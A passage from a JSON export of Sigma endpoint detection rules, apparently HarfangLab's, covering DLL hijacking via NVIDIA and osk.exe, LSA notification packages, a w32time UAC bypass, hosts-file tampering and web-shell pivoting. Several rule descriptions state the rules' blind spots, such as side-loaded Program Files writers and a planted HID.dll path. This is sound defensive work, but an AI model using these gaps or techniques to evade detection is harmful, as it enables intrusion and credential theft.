"content": "title: DLL Hijacking via Nvidia\nid: e9d4a930-394e-4a87-971c-3ff014c667b6\ndescription: |\n Detects a potential Windows DLL hijacking via Nvidia software.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to check the loaded DLL for malicious content as well as to investigate the behavior of the Nvidia process.\nreferences:\n - https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2025/05/23\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessInternalName: 'NVIDIA Notification'\n ProcessProduct: 'NVIDIA Notification'\n ProcessCompany: 'NVIDIA Corporation'\n ProcessSigned: 'true'\n ProcessSignature: 'Nvidia Corporation'\n ImageLoaded|endswith: '\\libcef.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\NVIDIA Corporation\\'\n - '?:\\Program Files (x86)\\NVIDIA Corporation\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\NVIDIA Corporation\\'\n - '?:\\Program Files (x86)\\NVIDIA Corporation\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'NVIDIA Corporation'\n - 'NVIDIA Corporation PE Sign v2???'\n - 'NVIDIA Corporation-PE-Prod-Sha1'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e9d4a930-394e-4a87-971c-3ff014c667b6",
"rule_name": "DLL Hijacking via Nvidia",
"rule_description": "Detects a potential Windows DLL hijacking via NVIDIA software: a signed NVIDIA Notification executable loading a libcef.dll that is neither located under the NVIDIA Corporation program directory nor signed by NVIDIA.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying the legitimate signed executable to a writable location and planting a malicious DLL in the same folder.\nIt is recommended to check the loaded DLL for malicious content as well as to investigate the behavior of the NVIDIA process.\n",
"rule_creation_date": "2025-05-23",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e9d731c0-0173-4196-8d31-3dd430a01429",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074177Z",
"creation_date": "2026-03-23T11:45:34.074179Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074183Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://malicious.link/posts/2013/2013-09-11-stealing-passwords-every-time-they-change/",
"https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/",
"https://attack.mitre.org/techniques/T1556/002/"
],
"name": "t1556_002_persistence_lsa_notification_package.yml",
"content": "title: LSA Notification Package Installed\nid: e9d731c0-0173-4196-8d31-3dd430a01429\ndescription: |\n Detects the installation of a new notification package to LSA configuration.\n Attackers can register a malicious notification package as a Windows DLL that will be loaded by LSASS.\n It is recommended to investigate the DLL added in the registry details for malicious content.\nreferences:\n - https://malicious.link/posts/2013/2013-09-11-stealing-passwords-every-time-they-change/\n - https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/\n - https://attack.mitre.org/techniques/T1556/002/\ndate: 2020/09/22\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.defense_evasion\n - attack.persistence\n - attack.t1556.002\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject:\n - 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Notification Packages'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Notification Packages'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_malwarebytes:\n Image: '?:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe'\n\n # msiexec /Y c:\\Program Files\\AppSense\\Environment Manager\\Agent\\EmLogon.dll'\n exclusion_appsense_emlogon:\n ProcessCommandLine: '*\\Program Files\\AppSense\\Environment Manager\\Agent\\EmLogon.dll*'\n Details: '*EmLogon*'\n\n exclusion_checkpoint:\n Image: '?:\\Program Files (x86)\\CheckPoint\\Endpoint Connect\\TracSrvWrapper.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Check Point Software Technologies Ltd.'\n\n exclusion_known_fp:\n Details:\n - 'scecli' # 
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc963221(v=technet.10)?redirectedfrom=MSDN\n - 'rassfm;scecli;clusauthmgr'\n - 'scecli;?:\\Program Files\\ThinkPad\\Bluetooth Software\\BtwProximityCP.dll'\n - 'scecli;?:\\Program Files\\ThinkVantage Fingerprint Software\\psqlpwd.dll'\n - 'scecli;ACGina' # Access Connections Gina Module is part of ThinkVantage Access Connections, a connectivity assistant program for your ThinkPad computer\n - 'scecli;rassfm'\n - 'rassfm;scecli'\n - 'scecli;cywlx' # Cryhod by Prim'X Technologies http://www.herdprotect.com/signer-primx-technologies-4f8b10a423838554100fc80feb2f3a47.aspx\n - 'rassfm;scecli;AzureADPasswordProtectionPFD.dll' # Azure AD Password Protection filter dll\n - 'SppFilter;rassfm;scecli'\n\n exclusion_hp:\n ProcessCommandLine: 'regsvr32.exe HPPwdFilter.dll /s /u'\n Details: 'DPPassFilter;scecli'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e9d731c0-0173-4196-8d31-3dd430a01429",
"rule_name": "LSA Notification Package Installed",
"rule_description": "Detects the installation of a new notification package in the LSA configuration (the Notification Packages registry value).\nAttackers can register a malicious notification package as a Windows DLL that will be loaded by LSASS and notified of every password change, which allows them to capture credentials in clear text.\nIt is recommended to investigate the DLL added in the registry details for malicious content.\n",
"rule_creation_date": "2020-09-22",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1556.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ea37d20b-3582-4d62-9a57-ae2a80e3f4a5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092608Z",
"creation_date": "2026-03-23T11:45:34.092610Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092615Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_prepare_uac_bypass_w32time.yml",
"content": "title: IDateTimeStateWriter COM UAC Bypass Prepared\nid: ea37d20b-3582-4d62-9a57-ae2a80e3f4a5\ndescription: |\n Detects the preparation of a UAC bypass via w32time service.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2021/01/07\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.t1112\n - attack.t1546.015\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_event_type:\n EventType: SetValue\n\n selection_dll_method:\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\Parameters\\ServiceDll'\n\n filter_dll_method:\n Details:\n - '%systemroot%\\system32\\w32time.dll'\n - '?:\\windows\\system32\\w32time.dll'\n\n selection_image_path_method:\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\ImagePath'\n\n filter_image_path_method:\n Details: '%SystemRoot%\\system32\\svchost.exe -k LocalService'\n\n condition: selection_event_type and ((selection_dll_method and not filter_dll_method) or (selection_image_path_method and not filter_image_path_method))\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ea37d20b-3582-4d62-9a57-ae2a80e3f4a5",
"rule_name": "IDateTimeStateWriter COM UAC Bypass Prepared",
"rule_description": "Detects the preparation of a UAC bypass via the w32time (Windows Time) service, i.e. a modification of the service's ServiceDll or ImagePath registry value to something other than the default.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\n",
"rule_creation_date": "2021-01-07",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.015",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ea4a20b7-8fa3-42dd-8761-60a1b0a2b1cc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619798Z",
"creation_date": "2026-03-23T11:45:34.619800Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619804Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/modifies_hosts_file",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_etc_hosts_windows.yml",
"content": "title: Suspicious Modification of Hosts File\nid: ea4a20b7-8fa3-42dd-8761-60a1b0a2b1cc\ndescription: |\n Detects a suspicious attempt to modify C:\\windows\\system32\\drivers\\etc\\hosts.\n This file is part of the network configuration and can be modified to falsify host resolution, redirect traffic to malicious servers, or prevent access to security-related domains.\n It is recommended to ensure that the file has been modified by a legitimate process and that the new content is not malicious.\nreferences:\n - https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/modifies_hosts_file\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2025/11/24\nmodified: 2026/02/05\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_event\n product: windows\ndetection:\n selection:\n Kind: 'write'\n Path: '?:\\Windows\\System32\\drivers\\etc\\hosts'\n\n exclusion_system:\n ProcessName: 'System'\n ProcessId: '4'\n\n exclusion_gpo:\n - ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n - ProcessParentImage|endswith: '\\svchost.exe'\n ProcessParentCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - 
'?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessParentUserSID: 'S-1-5-18'\n ProcessGrandparentImage: '?:\\Windows\\System32\\services.exe'\n - ProcessGrandparentImage|endswith: '\\svchost.exe'\n ProcessGrandparentCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessGrandparentUserSID: 'S-1-5-18'\n\n exclusion_scheduler:\n - ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule' # windows 10 Version 1703 and above\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p' # windows versions before 1703\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs' # windows 7\n - '?:\\windows\\system32\\svchost.exe -k netsvcs -s Schedule' # Windows 10 1703\n - ProcessParentCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule' # windows 10 Version 1703 and above\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p' # windows versions before 1703\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs' # windows 7\n - '?:\\windows\\system32\\svchost.exe -k netsvcs -s Schedule' # Windows 10 1703\n - ProcessGrandparentCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule' # windows 10 Version 1703 and above\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p' # windows versions before 1703\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs' # windows 7\n 
- '?:\\windows\\system32\\svchost.exe -k netsvcs -s Schedule' # Windows 10 1703\n - ProcessParentGrandparentCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule' # windows 10 Version 1703 and above\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p' # windows versions before 1703\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs' # windows 7\n - '?:\\windows\\system32\\svchost.exe -k netsvcs -s Schedule' # Windows 10 1703\n\n exclusion_legit_software:\n ProcessImage:\n - '?:\\Program Files\\\\*'\n - '?:\\Program Files (x86)\\\\*'\n - '?:\\Windows\\Downloaded Program Files\\\\*'\n # PDQ Inventory\n - '?:\\Windows\\AdminArsenal\\PDQInventory-Scanner\\\\*\\exec\\PDQInventoryScanner.exe'\n # Defender\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n # Herd\n - '?:\\Users\\\\*\\.config\\herd\\bin\\HerdHelper.exe'\n # Redondance IP\n - '*\\SrvRedondanceIP.exe'\n # WDHCP\n - '*\\Empower\\Instruments\\WDHCPServerSvc.exe'\n # LMS\n - '?:\\Windows\\System32\\DriverStore\\FileRepository\\lms.*\\LMS.exe'\n\n exclusion_interactive_text_editors:\n ProcessImage: '?:\\Windows\\System32\\notepad.exe'\n SessionLogonType:\n - '2' # Interactive\n - '11' # CachedInteractive\n\n exclusion_airport_reservation_system:\n ProcessCompany: 'RESA'\n ProcessOriginalFileName:\n - 'HostsFil.exe'\n - 'CrewsCupps.exe'\n\n exclusion_carbon_black:\n ProcessOriginalFileName: 'cb.exe'\n ProcessSignature: 'Carbon Black, Inc.'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ea4a20b7-8fa3-42dd-8761-60a1b0a2b1cc",
"rule_name": "Suspicious Modification of Hosts File",
"rule_description": "Detects a suspicious write to C:\\Windows\\System32\\drivers\\etc\\hosts.\nThis file is part of the network configuration and can be modified to falsify host name resolution, redirect traffic to malicious servers, or prevent access to security-related domains.\nNote that the rule excludes, among others, the Group Policy and Task Scheduler service hosts, interactive notepad.exe sessions and any executable located under Program Files, so a write performed through a tampered or side-loaded application installed there is not reported.\nIt is recommended to ensure that the file was modified by a legitimate process and that the new content is not malicious.\n",
"rule_creation_date": "2025-11-24",
"rule_modified_date": "2026-02-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ea71ee12-4cfd-47a1-9258-3e0faa2f3769",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081510Z",
"creation_date": "2026-03-23T11:45:34.081512Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081516Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/sensepost/reGeorg/tree/master",
"https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/",
"https://www.cert.ssi.gouv.fr/cti/CERTFR-2023-CTI-009/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1505_003_suspicious_network_connection_from_webserver_windows.yml",
"content": "title: Suspicious Network Activity from Web Server (Windows)\nid: ea71ee12-4cfd-47a1-9258-3e0faa2f3769\ndescription: |\n Detects suspicious network communications by a web server related to a possible web shell.\n Adversaries may backdoor web servers with web shells to establish persistent access to systems or to move laterally within a network.\n Tools like reGeorg can be used by attackers to pivot inside the compromised environment.\n It is recommended to verify the legitimacy of this network connection and check any other command executed by the web server.\nreferences:\n - https://github.com/sensepost/reGeorg/tree/master\n - https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/\n - https://www.cert.ssi.gouv.fr/cti/CERTFR-2023-CTI-009/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2023/10/27\nmodified: 2025/10/14\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.003\n - attack.lateral_movement\n - attack.t1021\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.RemoteShell\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: network_connection\n product: windows\ndetection:\n selection:\n ProcessImage|endswith:\n - '\\w3wp.exe' # IIS\n - '\\httpd.exe' # Apache\n - '\\nginx.exe'\n - '\\php-cgi.exe'\n - '\\tomcat.exe'\n # C:\\Program Files\\Tomcat\\bin\\tomcat7.exe\n # C:\\Program Files\\Tomcat\\bin\\tomcat8.exe\n # C:\\Program Files\\Apache Software Foundation\\Tomcat 9.0\\bin\\Tomcat9.exe\n - '\\tomcat?.exe'\n # C:\\Program Files\\Tomcat\\bin\\tomcat7w.exe\n - '\\tomcat??.exe'\n DestinationPort:\n - '22'\n - '445'\n - '3389'\n Initiated: 'true'\n\n exclusion_berger_levrault:\n ProcessImage: '?:\\CARLappl\\CSAdmin\\server\\bin\\tomcat?.exe'\n DestinationPort: '445'\n\n exclusion_netgear:\n ProcessImage: '?:\\Program 
Files\\NMS300\\NMS300\\apache-tomcat-*\\bin\\tomcat?.exe'\n DestinationPort:\n - '22'\n - '445'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ea71ee12-4cfd-47a1-9258-3e0faa2f3769",
"rule_name": "Suspicious Network Activity from Web Server (Windows)",
"rule_description": "Detects a web server process (IIS w3wp.exe, Apache httpd.exe, nginx, php-cgi or Tomcat) initiating an outbound connection to SSH (22), SMB (445) or RDP (3389), which may indicate a web shell being used as a pivot.\nAdversaries may backdoor web servers with web shells to establish persistent access to systems or to move laterally within a network.\nTools like reGeorg can be used by attackers to tunnel traffic through the compromised web server into the internal environment.\nA web server process rarely has a legitimate reason to open SSH, SMB or RDP sessions; it is recommended to verify the legitimacy of this connection and its destination, and to review any commands spawned by the web server process.\n",
"rule_creation_date": "2023-10-27",
"rule_modified_date": "2025-10-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1021",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ea9b1c80-b061-4116-a1ca-a492c161946d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602552Z",
"creation_date": "2026-03-23T11:45:34.602555Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602563Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mandiant.com/resources/blog/arbitrary-file-deletion-vulnerabilities",
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_osk.yml",
"content": "title: DLL Hijacking via osk.exe\nid: ea9b1c80-b061-4116-a1ca-a492c161946d\ndescription: |\n Detects potential Windows DLL Hijacking via osk.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.mandiant.com/resources/blog/arbitrary-file-deletion-vulnerabilities\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'osk.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\AUDIOSES.DLL'\n - '\\AVRT.dll'\n - '\\DEVOBJ.dll'\n - '\\dui70.dll'\n - '\\duser.dll'\n - '\\dwmapi.dll'\n - '\\ksuser.dll'\n - '\\midimap.dll'\n - '\\MMDevAPI.DLL'\n - '\\MSACM32.dll'\n - '\\OLEACC.dll'\n - '\\OskSupport.dll'\n - '\\WindowsCodecs.dll'\n - '\\winmm.dll'\n - '\\WMsgAPI.dll'\n - '\\HID.dll' # osk.exe process first looks for C:\\Program Files\\Common Files\\microsoft shared\\ink\\HID.dll, rather than its original location at C:\\Windows\\System32\\HID.dll\n filter_legitimate_image:\n Image|startswith:\n - 
'?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ea9b1c80-b061-4116-a1ca-a492c161946d",
"rule_name": "DLL Hijacking via osk.exe",
"rule_description": "Detects potential Windows DLL hijacking via osk.exe.\nDLL hijacking abuses the default Windows DLL search order by placing a victim application and a malicious DLL side by side.\nAttackers use this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nNote that the rule filters out osk.exe instances running from System32, SysWOW64 or WinSxS, and libraries that are loaded from those directories or signed by Microsoft Windows; a library planted in another search-order location and loaded by the genuine System32 osk.exe (such as the Common Files\\ink HID.dll path noted in the detection) therefore appears to fall outside this rule's scope.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "eab58a58-82b3-49a7-b89d-65ed296ee5ef",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
